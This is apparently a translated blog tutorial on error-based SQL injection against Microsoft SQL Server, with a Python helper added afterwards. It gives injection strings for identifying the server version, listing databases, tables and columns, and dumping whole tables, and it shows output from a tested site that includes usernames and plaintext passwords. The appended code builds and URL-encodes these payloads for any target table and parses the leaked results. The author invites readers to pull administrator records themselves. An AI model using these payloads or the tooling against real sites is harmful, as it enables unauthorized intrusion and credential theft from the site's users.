MSSQL SQL injection: retrieving data through echoed errors

0x01 Determine the database type

① Determine the type of database

and exists (select * from sysobjects)--          returns normally: the database is MSSQL (Microsoft SQL Server)
and exists (select count(*) from sysobjects)--   sometimes the statement above does not work; try this one

sysobjects is a SQL Server system view, so if the page still returns normally with this condition appended, the backend is MSSQL.

0x02 Determine the database version

?id=1 and 1=@@version--

?id=1 and substring((select @@version),22,4)='2008'--

The first statement compares the integer 1 with the @@version string; the string cannot be converted to int, so the conversion error message echoes the whole version banner (error-based, it needs the error to be displayed on the page). The second is for the case where errors are not echoed: "Microsoft SQL Server " is 21 characters long, so characters 22-25 of @@version hold the year, and if the page returns normally the server is SQL Server 2008 (swap in another year to test for other versions).

0x03 Get the number of databases

1. and 1=(select quotename(count(name)) from master..sysdatabases)--
2. and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases)--
3. and 1=(select str(count(name))%2b'|' from master..sysdatabases)--

The same three statements, skipping the system databases:

    and 1=(select quotename(count(name)) from master..sysdatabases where dbid>5)--
    and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>5)--
    and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5)--

Note: databases with dbid 1-4 are the system databases (master, tempdb, model, msdb); with dbid>5 as written the database with dbid 5 is skipped as well, so use dbid>4 if you want to count it. Each variant wraps the count in something that is not a valid integer (the brackets added by quotename, a trailing '|' or char(1)), so comparing it with 1 raises a conversion error that carries the count; a bare count(name) would convert cleanly and reveal nothing. %2b is the URL-encoded '+', which the web server would otherwise decode as a space.

 

 

0x05 Get all database names

and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))--

and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))--

FOR XML PATH('') concatenates every row into a single string, so one conversion error lists all database names at once (MSSQL 2005 and above only).

 

0x06 Get the current database

and db_name()>0

and 1=(select db_name())--

Both compare the varchar returned by db_name() with an integer, so the conversion error contains the name of the current database.

 

 

0x07 Get the tables in the current database

⑦ Get the tables in the current database (two statements are available). The statements below dump all tables of whichever database you name (MSSQL 2005 and above only):

    and 1=(select quotename(name) from database_name..sysobjects where xtype='U' FOR XML PATH(''))--
    and 1=(select '|'%2bname%2b'|' from database_name..sysobjects where xtype='U' FOR XML PATH(''))--

xtype='U' restricts sysobjects to user tables. Test result: three sensitive tables were found: Whir_Sec_Users / Whir_Mem_Member / Whir_Mem_MemberGroup. Echoed output of the quotename form (each table name in brackets):

 

 

[ahcmd][Siwebtmp][admin]

0x08 Get the columns of a table

⑧ Dump all columns of the specified table (MSSQL 2005 and above only):

    and 1=(select quotename(name) from database_name..syscolumns where id=(select id from database_name..sysobjects where name='table_name') FOR XML PATH(''))--
    and 1=(select '|'%2bname%2b'|' from database_name..syscolumns where id=(select id from database_name..sysobjects where name='table_name') FOR XML PATH(''))--

Result: since this is account information, I should say that, regardless of whether I am the administrator, my purpose in this post is not to obtain the administrator's information, only to demonstrate that the relevant information can be obtained by this method.

[id][name][password][home]

 

 

0x09 Dump the fields

Dump all fields of the specified table in the specified database, one row at a time (MSSQL 2005 and above only):

    and 1=(select top 1 * from database_name..table_name where <exclusion condition> FOR XML PATH(''))--

The exclusion condition rules out rows already retrieved (otherwise top 1 keeps returning the same row). To dump N rows with all their fields at once (MSSQL 2005 and above only):

    and 1=(select top N * from database_name..table_name FOR XML PATH(''))--

The first statement tested: and 1=(select top 1 * from database_name..table_name FOR XML PATH(''))--

Adding a where clause narrows the result, e.g. where name like '%user%' returns only rows whose name contains "user". This is also very handy when filtering table names.

Note: when using the statements that fetch everything in one go, use Firefox. In my tests IE8, 360 Speed Browser and Cheetah Browser all hung; Firefox also freezes for a few seconds and pops up a dialog, and clicking "Stop script" gets past it. At this point we have the account information; as for the administrator's, haha, just switch tables when you test it yourselves.

Dumped output (the columns of each row follow one another with no row wrapper, so a new row begins wherever <id> reappears):

<id>1</id><name>alex</name><password>HACKER</password><home>LLLAS</home><id>2</id><name>BOM</name><password>QWE123z</password><home>bananqu</home><id>3</id><name>Csle</name><password>hu1982</password><home>jiujinsa</home><id>4</id><name>Fsjam</name><password>qwoe555</password><home>www</home><id>5</id><name>admin</name><password>admin</password><home>admin1111</home>
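As an added example that is not part of the original post, the Python helpers below build the payloads used from 0x03 through 0x09 for an arbitrary database and table, URL-encode them the way the page does (%2b for '+'), and parse the two kinds of output the page shows: the bracketed quotename list that comes back inside the conversion error, and the FOR XML PATH('') dump above. The leading "and" (a numeric WHERE clause is assumed), the assumption that the application echoes SQL Server's conversion error text, and the sample error page in the code are assumptions, not from the original post; the sample dump is the page's own output.

```python
"""Helpers for the error-based MSSQL extraction chain shown on this page.

Added example, not code from the original post: builds the page's payloads
for a given database/table and parses the outputs the page shows. Assumes the
injected parameter ends a numeric WHERE clause (hence the leading "and") and
that the application echoes SQL Server's conversion error into the response.
"""
import re
from typing import Dict, List
from urllib.parse import quote


def _inject(select_sql: str) -> str:
    # Comparing int 1 with a non-numeric string makes SQL Server raise a
    # conversion error whose text carries the string: that is the "echo".
    return f"and 1=({select_sql})--"

def payload_db_count(min_dbid: int = 0) -> str:
    # quotename() brackets the count so it is no longer a valid integer.
    where = f" where dbid>{min_dbid}" if min_dbid else ""
    return _inject(f"select quotename(count(name)) from master..sysdatabases{where}")

def payload_db_names() -> str:
    # FOR XML PATH('') folds every row into one string (MSSQL 2005+).
    return _inject("select quotename(name) from master..sysdatabases FOR XML PATH('')")

def payload_db_names_pipe() -> str:
    # The page's '|'-delimited variant; '+' has to travel as %2b.
    return _inject("select '|'+name+'|' from master..sysdatabases FOR XML PATH('')")

def payload_tables(db: str) -> str:
    return _inject(f"select quotename(name) from {db}..sysobjects "
                   f"where xtype='U' FOR XML PATH('')")

def payload_columns(db: str, table: str) -> str:
    return _inject(f"select quotename(name) from {db}..syscolumns where id="
                   f"(select id from {db}..sysobjects where name='{table}') "
                   f"FOR XML PATH('')")

def payload_rows(db: str, table: str, n: int = 1, where: str = "") -> str:
    # `where` is the page's exclusion condition, e.g. "id>1" to skip row 1.
    cond = f" where {where}" if where else ""
    return _inject(f"select top {n} * from {db}..{table}{cond} FOR XML PATH('')")

def url_encode(payload: str) -> str:
    # '+' becomes %2B and '|' %7C (a raw '+' would be decoded as a space);
    # the SQL punctuation is left readable for proxy logs.
    return quote(payload, safe="=()'*,")


# Message 245 on 2005+, "Syntax error converting ... to a column of data type
# int" on SQL Server 2000; both carry the leaked string between quotes.
_CONV_ERR = re.compile(
    r"converting the n?varchar value '(.*?)' to (?:a column of )?data type int", re.S)

def value_from_error(page_text: str) -> str:
    """Pull the leaked string out of an echoed conversion error."""
    m = _CONV_ERR.search(page_text)
    if not m:
        raise ValueError("no conversion error in response; errors may not be echoed")
    return m.group(1)

def parse_quotename_list(blob: str) -> List[str]:
    # "[ahcmd][Siwebtmp][admin]" -> ["ahcmd", "Siwebtmp", "admin"]
    # (quotename doubles a ']' inside a name; that escape is not undone here).
    return re.findall(r"\[([^\]]*)\]", blob)

def parse_xml_rows(blob: str) -> List[Dict[str, str]]:
    """Split a FOR XML PATH('') dump of `select *` into rows.

    PATH('') emits no row element: the columns of every row simply follow
    one another, so a new row starts whenever the first column name comes
    round again (the first column is assumed never NULL). FOR XML omits
    NULL columns entirely, so rows are keyed by name, not by position.
    """
    cells = re.findall(r"<([^<>/]+)>(.*?)</\1>", blob, re.S)
    rows: List[Dict[str, str]] = []
    first = cells[0][0] if cells else None
    for col, val in cells:
        if col == first:
            rows.append({})
        rows[-1][col] = val
    return rows


# Constructed samples: the dump is the page's own output (first two rows);
# the error page is built to the shape of message 245, not a real capture.
SAMPLE_DUMP = ("<id>1</id><name>alex</name><password>HACKER</password><home>LLLAS</home>"
               "<id>2</id><name>BOM</name><password>QWE123z</password><home>bananqu</home>")
SAMPLE_ERROR_PAGE = ("Conversion failed when converting the nvarchar value "
                     "'[ahcmd][Siwebtmp][admin]' to data type int.")

if __name__ == "__main__":
    print(url_encode(payload_columns("mydb", "Whir_Sec_Users")))
    print(parse_quotename_list(value_from_error(SAMPLE_ERROR_PAGE)))
    for row in parse_xml_rows(SAMPLE_DUMP):
        print(row)
```

The row parser keys cells by column name because FOR XML drops NULL columns, so positional splitting would silently shift values between rows; it does assume the first column (normally the key) is never NULL.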


Origin www.cnblogs.com/-zhong/p/10944660.html